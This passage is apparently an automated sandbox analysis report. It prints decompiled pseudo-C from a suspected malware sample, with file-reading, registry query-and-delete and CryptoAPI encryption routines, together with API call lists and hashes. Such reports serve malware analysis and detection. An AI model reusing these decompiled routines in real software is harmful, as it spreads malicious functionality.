                                                                                                                                                                                                                                                                                          									_v8 = E040016F0(_v20, _v16);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								VirtualFree(_v20, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						FindCloseChangeNotification(_v12); // executed
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                                                                                          0x04005cd6
                                                                                                                                                                                                                                                                                          0x04005ce1
                                                                                                                                                                                                                                                                                          0x04005d10
                                                                                                                                                                                                                                                                                          0x04005d16
                                                                                                                                                                                                                                                                                          0x04005d1d
                                                                                                                                                                                                                                                                                          0x04005d2f
                                                                                                                                                                                                                                                                                          0x04005d36
                                                                                                                                                                                                                                                                                          0x04005d45
                                                                                                                                                                                                                                                                                          0x04005d4b
                                                                                                                                                                                                                                                                                          0x04005d52
                                                                                                                                                                                                                                                                                          0x04005d54
                                                                                                                                                                                                                                                                                          0x04005d6d
                                                                                                                                                                                                                                                                                          0x04005d79
                                                                                                                                                                                                                                                                                          0x04005d8b
                                                                                                                                                                                                                                                                                          0x04005d8b
                                                                                                                                                                                                                                                                                          0x04005d99
                                                                                                                                                                                                                                                                                          0x04005d99
                                                                                                                                                                                                                                                                                          0x04005d52
                                                                                                                                                                                                                                                                                          0x04005da3
                                                                                                                                                                                                                                                                                          0x04005da3
                                                                                                                                                                                                                                                                                          0x04005d1d
                                                                                                                                                                                                                                                                                          0x04005daf

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04005CEB
                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04005D10
                                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 04005D29
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005D45
                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 04005D6D
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04005D99
                                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(000000FF), ref: 04005DA3
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: File$Virtual$AllocChangeCloseCreateFindFreeNotificationReadSizelstrlen
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 443218420-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 071662be6b1e22e21ec0747122ec9fe5ab089f82a602849f769d97fd77600298
                                                                                                                                                                                                                                                                                          • Instruction ID: 1c3b7df952a912c4f86c12ad70d9a091debb45511137cc5b62942badbf1a5776
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 071662be6b1e22e21ec0747122ec9fe5ab089f82a602849f769d97fd77600298
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7021EC75A00208FBEB64DFA4DC49BAE77B5EB48705F108659F615BB2C0C778AA80CF51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04005B50(CHAR* _a4, char* _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                                                                                                                          				int _v28;
                                                                                                                                                                                                                                                                                          				int _v32;
                                                                                                                                                                                                                                                                                          				char* _v36;
                                                                                                                                                                                                                                                                                          				char* _v40;
                                                                                                                                                                                                                                                                                          				void* _v44;
                                                                                                                                                                                                                                                                                          				void* _t69;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
                                                                                                                                                                                                                                                                                          					_v32 = lstrlenA(_a8);
                                                                                                                                                                                                                                                                                          					_v28 = lstrlenA(_a4);
                                                                                                                                                                                                                                                                                          					_v24 = 0;
                                                                                                                                                                                                                                                                                          					_v16 = 0;
                                                                                                                                                                                                                                                                                          					while(_v24 < _v28) {
                                                                                                                                                                                                                                                                                          						_v36 = StrStrIA( &(_a4[_v24]), _a8);
                                                                                                                                                                                                                                                                                          						if(_v36 != 0) {
                                                                                                                                                                                                                                                                                          							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                                          							_v24 = _v36 - _a4 + _v32;
                                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v20 = _v16 * 0x28;
                                                                                                                                                                                                                                                                                          					_t69 = VirtualAlloc(0, _v20, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          					_v12 = _t69;
                                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          						_v24 = 0;
                                                                                                                                                                                                                                                                                          						_v16 = 0;
                                                                                                                                                                                                                                                                                          						while(_v24 < _v28) {
                                                                                                                                                                                                                                                                                          							_v40 = StrStrIA( &(_a4[_v24]), _a8);
                                                                                                                                                                                                                                                                                          							if(_v40 != 0) {
                                                                                                                                                                                                                                                                                          								lstrcpynA(_v12 + _v16 * 0x28,  &(_a4[_v24]), _v40 -  &(_a4[_v24]) + 1);
                                                                                                                                                                                                                                                                                          								_v24 = _v40 - _a4 + _v32;
                                                                                                                                                                                                                                                                                          								_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                                          								_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                                          								 *_a12 = _v12;
                                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							break;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						if(_a16 != 0) {
                                                                                                                                                                                                                                                                                          							_v44 = VirtualAlloc(0, _v20, 0x3000, 4);
                                                                                                                                                                                                                                                                                          							if(_v44 != 0) {
                                                                                                                                                                                                                                                                                          								E04007B70(_v44, _v12, _v20);
                                                                                                                                                                                                                                                                                          								 *_a16 = _v44;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                                                                                          0x04005b56
                                                                                                                                                                                                                                                                                          0x04005b61
                                                                                                                                                                                                                                                                                          0x04005b85
                                                                                                                                                                                                                                                                                          0x04005b92
                                                                                                                                                                                                                                                                                          0x04005b95
                                                                                                                                                                                                                                                                                          0x04005b9c
                                                                                                                                                                                                                                                                                          0x04005ba3
                                                                                                                                                                                                                                                                                          0x04005bbc
                                                                                                                                                                                                                                                                                          0x04005bc3
                                                                                                                                                                                                                                                                                          0x04005bcb
                                                                                                                                                                                                                                                                                          0x04005bd7
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04005bde
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04005bc3
                                                                                                                                                                                                                                                                                          0x04005be6
                                                                                                                                                                                                                                                                                          0x04005bf6
                                                                                                                                                                                                                                                                                          0x04005bfc
                                                                                                                                                                                                                                                                                          0x04005c03
                                                                                                                                                                                                                                                                                          0x04005c09
                                                                                                                                                                                                                                                                                          0x04005c10
                                                                                                                                                                                                                                                                                          0x04005c17
                                                                                                                                                                                                                                                                                          0x04005c30
                                                                                                                                                                                                                                                                                          0x04005c37
                                                                                                                                                                                                                                                                                          0x04005c59
                                                                                                                                                                                                                                                                                          0x04005c68
                                                                                                                                                                                                                                                                                          0x04005c71
                                                                                                                                                                                                                                                                                          0x04005c7a
                                                                                                                                                                                                                                                                                          0x04005c87
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04005c87
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04005c37
                                                                                                                                                                                                                                                                                          0x04005c8f
                                                                                                                                                                                                                                                                                          0x04005ca4
                                                                                                                                                                                                                                                                                          0x04005cab
                                                                                                                                                                                                                                                                                          0x04005cb9
                                                                                                                                                                                                                                                                                          0x04005cc7
                                                                                                                                                                                                                                                                                          0x04005cc7
                                                                                                                                                                                                                                                                                          0x04005cab
                                                                                                                                                                                                                                                                                          0x04005c8f
                                                                                                                                                                                                                                                                                          0x04005c03
                                                                                                                                                                                                                                                                                          0x04005ccf

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04005B7F
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04005B8C
                                                                                                                                                                                                                                                                                          • StrStrIA.SHLWAPI(00000000,00000000), ref: 04005BB6
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005BF6
                                                                                                                                                                                                                                                                                          • StrStrIA.SHLWAPI(00000000,00000000), ref: 04005C2A
                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(00000000,00000000,-00000001), ref: 04005C59
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005C9E
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AllocVirtuallstrlen$lstrcpyn
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 808621155-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 87716a91232c7d4b55081c1f55d7f64912373dfad697bd4087df7a6950954879
                                                                                                                                                                                                                                                                                          • Instruction ID: 5a59fe48962482dc997a37d5c0ed7d0013e253906576cb4b19edba68c8a08fb2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87716a91232c7d4b55081c1f55d7f64912373dfad697bd4087df7a6950954879
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D451C774904209EFEB04CF94C998BEEBBB5EF48305F148559E505B7284D379AA80CFA5
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04006CF0() {
                                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                                                                                                                          				int _v24;
                                                                                                                                                                                                                                                                                          				long _v28;
                                                                                                                                                                                                                                                                                          				char _v60;
                                                                                                                                                                                                                                                                                          				long _t21;
                                                                                                                                                                                                                                                                                          				long _t24;
                                                                                                                                                                                                                                                                                          				char* _t26;
                                                                                                                                                                                                                                                                                          				char* _t30;
                                                                                                                                                                                                                                                                                          				char* _t32;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                                          				_v12 = 0x80000001;
                                                                                                                                                                                                                                                                                          				if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          					_v12 = 0x80000002;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v16 = 0;
                                                                                                                                                                                                                                                                                          				_t32 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                                          				_t21 = RegOpenKeyExA(_v12, _t32, 0, 0xf003f,  &_v16); // executed
                                                                                                                                                                                                                                                                                          				if(_t21 == 0) {
                                                                                                                                                                                                                                                                                          					_v24 = 0x20;
                                                                                                                                                                                                                                                                                          					_v20 = 3;
                                                                                                                                                                                                                                                                                          					_t30 =  *0x4011890; // 0x4013fa6
                                                                                                                                                                                                                                                                                          					_t24 = RegQueryValueExA(_v16, _t30, 0,  &_v20,  &_v60,  &_v24); // executed
                                                                                                                                                                                                                                                                                          					_v28 = _t24;
                                                                                                                                                                                                                                                                                          					if(_v28 == 0) {
                                                                                                                                                                                                                                                                                          						_v5 = 1;
                                                                                                                                                                                                                                                                                          						_t26 =  *0x4011890; // 0x4013fa6
                                                                                                                                                                                                                                                                                          						RegDeleteValueA(_v16, _t26);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					RegCloseKey(_v16); // executed
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v5;
                                                                                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                                                                                          0x04006cf6
                                                                                                                                                                                                                                                                                          0x04006cfa
                                                                                                                                                                                                                                                                                          0x04006d0a
                                                                                                                                                                                                                                                                                          0x04006d0c
                                                                                                                                                                                                                                                                                          0x04006d0c
                                                                                                                                                                                                                                                                                          0x04006d13
                                                                                                                                                                                                                                                                                          0x04006d25
                                                                                                                                                                                                                                                                                          0x04006d30
                                                                                                                                                                                                                                                                                          0x04006d38
                                                                                                                                                                                                                                                                                          0x04006d3a
                                                                                                                                                                                                                                                                                          0x04006d41
                                                                                                                                                                                                                                                                                          0x04006d56
                                                                                                                                                                                                                                                                                          0x04006d61
                                                                                                                                                                                                                                                                                          0x04006d67
                                                                                                                                                                                                                                                                                          0x04006d6e
                                                                                                                                                                                                                                                                                          0x04006d70
                                                                                                                                                                                                                                                                                          0x04006d74
                                                                                                                                                                                                                                                                                          0x04006d7e
                                                                                                                                                                                                                                                                                          0x04006d7e
                                                                                                                                                                                                                                                                                          0x04006d88
                                                                                                                                                                                                                                                                                          0x04006d88
                                                                                                                                                                                                                                                                                          0x04006d94

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,04013B88,00000000,000F003F,00000000), ref: 04006D30
                                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,04013FA6,00000000,00000003,?,00000020), ref: 04006D61
                                                                                                                                                                                                                                                                                          • RegDeleteValueA.ADVAPI32(00000000,04013FA6), ref: 04006D7E
                                                                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 04006D88
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Value$CloseDeleteOpenQuery
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 647993726-3916222277
                                                                                                                                                                                                                                                                                          • Opcode ID: 7e3867fdce199c8a5bb6ff6aa161a31bc633291f878d7ee7a05f6acc28b5ac08
                                                                                                                                                                                                                                                                                          • Instruction ID: 88112219bc8656018e8fd12fe99521312711d887651bf4d09d45951e100356d5
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e3867fdce199c8a5bb6ff6aa161a31bc633291f878d7ee7a05f6acc28b5ac08
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE114275D04208AFEB04DFE0D848BBEBBB8FB48304F148158EA00BB280D77D5A45CBA0
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04008370(intOrPtr _a4, long _a8, char _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                                                                                                                          				intOrPtr* _v56;
                                                                                                                                                                                                                                                                                          				long _v60;
                                                                                                                                                                                                                                                                                          				void* _t79;
                                                                                                                                                                                                                                                                                          				void* _t80;
                                                                                                                                                                                                                                                                                          				void* _t85;
                                                                                                                                                                                                                                                                                          				void* _t90;
                                                                                                                                                                                                                                                                                          				void* _t94;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0 || _a16 < _a8) {
                                                                                                                                                                                                                                                                                          					L17:
                                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t79 = VirtualAlloc(0, 0x1000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          					_v16 = _t79;
                                                                                                                                                                                                                                                                                          					_t80 = VirtualAlloc(0, 0x1000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          					_v12 = _t80;
                                                                                                                                                                                                                                                                                          					if(_v16 != 0 && _v12 != 0) {
                                                                                                                                                                                                                                                                                          						_v24 = 0x1000;
                                                                                                                                                                                                                                                                                          						_v20 = 0x1000;
                                                                                                                                                                                                                                                                                          						_t85 = E04008800(_v16,  &_v24, _v12,  &_v20, 0x4013378, 0x94); // executed
                                                                                                                                                                                                                                                                                          						if(_t85 != 0) {
                                                                                                                                                                                                                                                                                          							_t21 = _a8 + 0x10; // 0x1010
                                                                                                                                                                                                                                                                                          							_v28 = _v20 + _t21;
                                                                                                                                                                                                                                                                                          							_t170 = _a16 - _v28;
                                                                                                                                                                                                                                                                                          							if(_a16 >= _v28) {
                                                                                                                                                                                                                                                                                          								_v40 = E04008770(_t170, 0xa);
                                                                                                                                                                                                                                                                                          								_v36 = E040087D0(0xffffffff);
                                                                                                                                                                                                                                                                                          								_t90 = VirtualAlloc(0, _a8, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          								_v32 = _t90;
                                                                                                                                                                                                                                                                                          								if(_v32 != 0) {
                                                                                                                                                                                                                                                                                          									_v44 = _a8;
                                                                                                                                                                                                                                                                                          									E04007B70(_v32, _a4, _a8);
                                                                                                                                                                                                                                                                                          									_t94 = E04008970(_v32,  &_v44, _v16, _v24); // executed
                                                                                                                                                                                                                                                                                          									if(_t94 != 0) {
                                                                                                                                                                                                                                                                                          										_v48 = _a12;
                                                                                                                                                                                                                                                                                          										E040085D0( &_v48,  &_v40, 4);
                                                                                                                                                                                                                                                                                          										E040085D0( &_v48,  &_v36, 4);
                                                                                                                                                                                                                                                                                          										_v60 = 0;
                                                                                                                                                                                                                                                                                          										_v56 = _v48;
                                                                                                                                                                                                                                                                                          										E040085D0( &_v48,  &_v60, 4);
                                                                                                                                                                                                                                                                                          										_v52 = _v48;
                                                                                                                                                                                                                                                                                          										E040085D0( &_v48,  &_v20, 4);
                                                                                                                                                                                                                                                                                          										E040085D0( &_v48, _v12, _v20);
                                                                                                                                                                                                                                                                                          										E04008650(_v36, _v52, _v48 - _v52, _v36);
                                                                                                                                                                                                                                                                                          										E040085D0( &_v48, _v32, _v44);
                                                                                                                                                                                                                                                                                          										 *_v56 = E040016F0(_a12 + 0xc, _v48 - _a12 + 0xc);
                                                                                                                                                                                                                                                                                          										_v8 = _v48 - _a12;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									VirtualFree(_v32, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(_v16 != 0) {
                                                                                                                                                                                                                                                                                          						VirtualFree(_v16, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          						VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L17;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}






















                                                                                                                                                                                                                                                                                          0x04008376
                                                                                                                                                                                                                                                                                          0x04008381
                                                                                                                                                                                                                                                                                          0x040085c0
                                                                                                                                                                                                                                                                                          0x040085c6
                                                                                                                                                                                                                                                                                          0x040083b1
                                                                                                                                                                                                                                                                                          0x040083bf
                                                                                                                                                                                                                                                                                          0x040083c5
                                                                                                                                                                                                                                                                                          0x040083d6
                                                                                                                                                                                                                                                                                          0x040083dc
                                                                                                                                                                                                                                                                                          0x040083e3
                                                                                                                                                                                                                                                                                          0x040083f3
                                                                                                                                                                                                                                                                                          0x040083fa
                                                                                                                                                                                                                                                                                          0x0400841b
                                                                                                                                                                                                                                                                                          0x04008425
                                                                                                                                                                                                                                                                                          0x04008431
                                                                                                                                                                                                                                                                                          0x04008435
                                                                                                                                                                                                                                                                                          0x0400843b
                                                                                                                                                                                                                                                                                          0x0400843e
                                                                                                                                                                                                                                                                                          0x0400844e
                                                                                                                                                                                                                                                                                          0x0400845b
                                                                                                                                                                                                                                                                                          0x0400846b
                                                                                                                                                                                                                                                                                          0x04008471
                                                                                                                                                                                                                                                                                          0x04008478
                                                                                                                                                                                                                                                                                          0x04008481
                                                                                                                                                                                                                                                                                          0x04008490
                                                                                                                                                                                                                                                                                          0x040084a8
                                                                                                                                                                                                                                                                                          0x040084b2
                                                                                                                                                                                                                                                                                          0x040084bb
                                                                                                                                                                                                                                                                                          0x040084c8
                                                                                                                                                                                                                                                                                          0x040084da
                                                                                                                                                                                                                                                                                          0x040084e2
                                                                                                                                                                                                                                                                                          0x040084ec
                                                                                                                                                                                                                                                                                          0x040084f9
                                                                                                                                                                                                                                                                                          0x04008504
                                                                                                                                                                                                                                                                                          0x04008511
                                                                                                                                                                                                                                                                                          0x04008525
                                                                                                                                                                                                                                                                                          0x0400853c
                                                                                                                                                                                                                                                                                          0x04008550
                                                                                                                                                                                                                                                                                          0x04008576
                                                                                                                                                                                                                                                                                          0x0400857e
                                                                                                                                                                                                                                                                                          0x0400857e
                                                                                                                                                                                                                                                                                          0x0400858c
                                                                                                                                                                                                                                                                                          0x0400858c
                                                                                                                                                                                                                                                                                          0x04008478
                                                                                                                                                                                                                                                                                          0x0400843e
                                                                                                                                                                                                                                                                                          0x04008425
                                                                                                                                                                                                                                                                                          0x04008596
                                                                                                                                                                                                                                                                                          0x040085a3
                                                                                                                                                                                                                                                                                          0x040085a3
                                                                                                                                                                                                                                                                                          0x040085ad
                                                                                                                                                                                                                                                                                          0x040085ba
                                                                                                                                                                                                                                                                                          0x040085ba
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040085ad

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 040083BF
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 040083D6
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0400846B
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 040089BF
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: GetLastError.KERNEL32 ref: 040089C9
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 040089F8
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008A1F
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 04008A41
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: CryptDestroyKey.ADVAPI32(00000000), ref: 04008A4E
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008A5A
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0400858C
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 040085A3
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 040085BA
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,04008420,00000000,00001000,00000000), ref: 0400883B
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: GetLastError.KERNEL32 ref: 04008845
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008874
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptGenKey.ADVAPI32(00000000,00006801,?,00000000), ref: 040088AF
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 040088CF
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?), ref: 0400890C
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptExportKey.ADVAPI32(00000000,?,00000001,00000000,00000000,00000000), ref: 0400892A
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptDestroyKey.ADVAPI32(?), ref: 04008937
                                                                                                                                                                                                                                                                                            • Part of subcall function 040087D0: QueryPerformanceCounter.KERNEL32(?), ref: 040087E7
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
